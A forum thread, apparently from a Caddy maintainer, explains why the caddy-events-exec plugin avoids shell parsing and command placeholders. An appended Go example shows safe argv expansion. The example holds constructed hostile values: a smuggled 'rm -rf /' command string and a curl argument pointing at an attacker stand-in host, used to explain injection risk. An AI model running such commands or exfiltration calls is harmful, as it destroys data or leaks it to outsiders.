Thanks for the info, I don’t know much about dbus, so that sounds pretty interesting. It’d probably make a good Caddy plugin for starters!
Fair point. I blame the distros / package managers for not being capable of doing what is needed to provide secure, statically linked binaries. So, this is unfortunate, indeed.
I honestly don’t know what security concerns the caddy-events-exec plugin has. We are just not including it out of an abundance of caution and because we don’t know enough about people’s requirements or use cases yet. If the plugin turns out to be popular, we may merge it in.
Go is memory-safe, so you can’t just overflow a buffer and access arbitrary memory or run commands. I’m definitely not worried about that. My bigger concern over “arbitrary commands” is the user’s configuration: how easily can they configure an insecure server?
For example, if we allowed placeholders to be used where the command is specified, then it might definitely be possible for other entities to cause a value of a placeholder to be something other than what was intended, maybe via some sort of injection attack. I dunno. It’s purely speculative, but that’s why I didn’t implement placeholder support for the command to be run. (Placeholders are supported for arguments, just not the command itself.) You could imagine the damage that could be done if an arbitrary curl command was executable, for example.
Similarly, we don’t do any special parsing of the command. No shell expansion, no shell-like parsing. (Only placeholders on the arguments are allowed. But no bash syntax, for example.) You have to give the command and arguments, one per token, pretty basic. This prevents weird results of parsing leading to running commands that aren’t expected.
Even with this, I could imagine a curl command being run with an argument that’s expanded from placeholders into something the user doesn’t expect, leading to curl making a request to some arbitrary endpoint…
So really, it’s more of a “here’s a separate plugin so you can shoot yourself in the foot unless you know what you’re doing” – and we’re not ready to bundle that kind of thing into the standard distribution until we understand the userscape better.
But I don’t know of any innate security vulnerabilities. I don’t think you need to be scared of it as long as you don’t create an abusable configuration.
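To make the design points in the posts above concrete (no shell parsing, one token per argument, placeholders expanded only in arguments and never in the command itself, and the residual risk of an argument expanding into something like a curl destination), here is an added Go example. It is not code from caddy-events-exec or from Caddy; the `{name}` placeholder syntax, the `BuildArgv`/`Run` helpers and the `event.data.*` names are assumptions made for illustration, and Caddy’s real replacer is not reproduced.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"os/exec"
	"regexp"
	"strings"
	"time"
)

// placeholderRe matches {name}-style placeholders. This syntax is an
// assumption for the example; it is not Caddy's actual placeholder grammar.
var placeholderRe = regexp.MustCompile(`\{[^{}]+\}`)

var errPlaceholderInCommand = errors.New("placeholders are not allowed in the command token")

// BuildArgv takes an already tokenized command (one element per token, exactly
// as the user wrote it, with no shell parsing) and expands placeholders in the
// arguments only. The command token is refused if it contains a placeholder.
// An expanded value stays inside its own argv element, so shell metacharacters
// in a value can never split it into extra tokens or extra commands.
func BuildArgv(tokens []string, values map[string]string) ([]string, error) {
	if len(tokens) == 0 {
		return nil, errors.New("empty command")
	}
	if placeholderRe.MatchString(tokens[0]) {
		return nil, errPlaceholderInCommand
	}
	argv := make([]string, len(tokens))
	argv[0] = tokens[0]
	for i, tok := range tokens[1:] {
		argv[i+1] = placeholderRe.ReplaceAllStringFunc(tok, func(m string) string {
			key := strings.Trim(m, "{}")
			if v, ok := values[key]; ok {
				return v
			}
			return m // unknown placeholders are left untouched
		})
	}
	return argv, nil
}

// Run executes argv directly: argv[0] is looked up on PATH and the remaining
// elements are passed to the process unchanged. No shell is involved.
func Run(ctx context.Context, argv []string) (string, error) {
	cmd := exec.CommandContext(ctx, argv[0], argv[1:]...)
	out, err := cmd.CombinedOutput()
	return string(out), err
}

func main() {
	// Constructed placeholder values, standing in for values that some other
	// entity (a request, a certificate subject) might be able to influence.
	values := map[string]string{
		"event.data.name": "example.com; rm -rf /",
		"event.data.url":  "http://attacker.example/collect",
	}

	// Shell metacharacters in the value remain one argument to a benign command.
	argv, err := BuildArgv([]string{"echo", "renewed", "{event.data.name}"}, values)
	fmt.Println(argv, err) // [echo renewed example.com; rm -rf /] <nil>

	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()
	out, _ := Run(ctx, argv)
	fmt.Printf("%q\n", out) // "renewed example.com; rm -rf /\n"

	// A placeholder in the command token itself is refused outright.
	_, err = BuildArgv([]string{"{event.data.cmd}", "-x"}, values)
	fmt.Println(err) // placeholders are not allowed in the command token

	// The residual risk the post describes: the configuration is what decides
	// whether an expanded argument becomes a destination for a tool like curl.
	argv, _ = BuildArgv([]string{"curl", "-s", "{event.data.url}"}, values)
	fmt.Println(argv) // [curl -s http://attacker.example/collect]
}
```

The safety property here comes entirely from never handing the tokens to a shell: `exec.Command` receives an argv slice, so a value like `example.com; rm -rf /` is one string the child process sees as a single argument. What the code cannot protect against is the operator choosing a command whose own arguments are dangerous when attacker-influenced, which is exactly the curl case from the thread.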